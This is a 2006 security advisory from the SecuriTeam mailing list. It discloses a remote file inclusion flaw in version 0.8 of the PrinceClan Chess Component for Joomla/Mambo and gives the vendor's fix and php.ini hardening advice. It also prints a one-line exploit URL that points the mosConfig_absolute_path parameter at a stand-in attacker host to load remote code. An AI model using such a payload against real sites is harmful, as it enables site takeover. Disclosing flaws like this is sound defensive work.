[UNIX] PrinceClan Chess Component File Inclusion
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 31 Jul 2006 18:28:55 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PrinceClan Chess Component File Inclusion
------------------------------------------------------------------------
SUMMARY
The <http://www.princeclan.org/> PrinceClan Chess Component has been
found to contain a vulnerability that allows remote attackers to cause the
product to include arbitrary files into its execution process, allowing
attackers to execute arbitrary code.
DETAILS
Vulnerable Systems:
* PrinceClan Chess Component version 0.8
Exploit:
The following URL will cause the inclusion of a remote file:
http://[host.com]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://evil.txt?
Vendor response:
Due to a recent exploit discovered in Joomla and Mambo, all the Princeclan
components need modification to prevent hackers from taking control of
your site.
Add this line of code immediately after the first <?php tag to each file
with the extension .php:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not
allowed. ');
Failure to do this will result in your site being vulnerable to attack!
For additional protection, you should also change register_globals and
allow_url_fopen to off in the php.ini file for your site, if your ISP
allows this. This will protect you from the same vulnerability which
exists in many other components, modules, and mambots.
ADDITIONAL INFORMATION
The information has been provided by <mailto:tr_zindan@xxxxxxxxxxxxxxxx>
Tr_ZiNDaN.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] Midirecord2 Local Buffer Overflow (filename)
- Next by Date: [UNIX] PHP ip2long() Function Circumvention (miniBB)
- Previous by thread: [UNIX] Midirecord2 Local Buffer Overflow (filename)
- Next by thread: [UNIX] PHP ip2long() Function Circumvention (miniBB)
- Index(es):
Relevant Pages
|
|
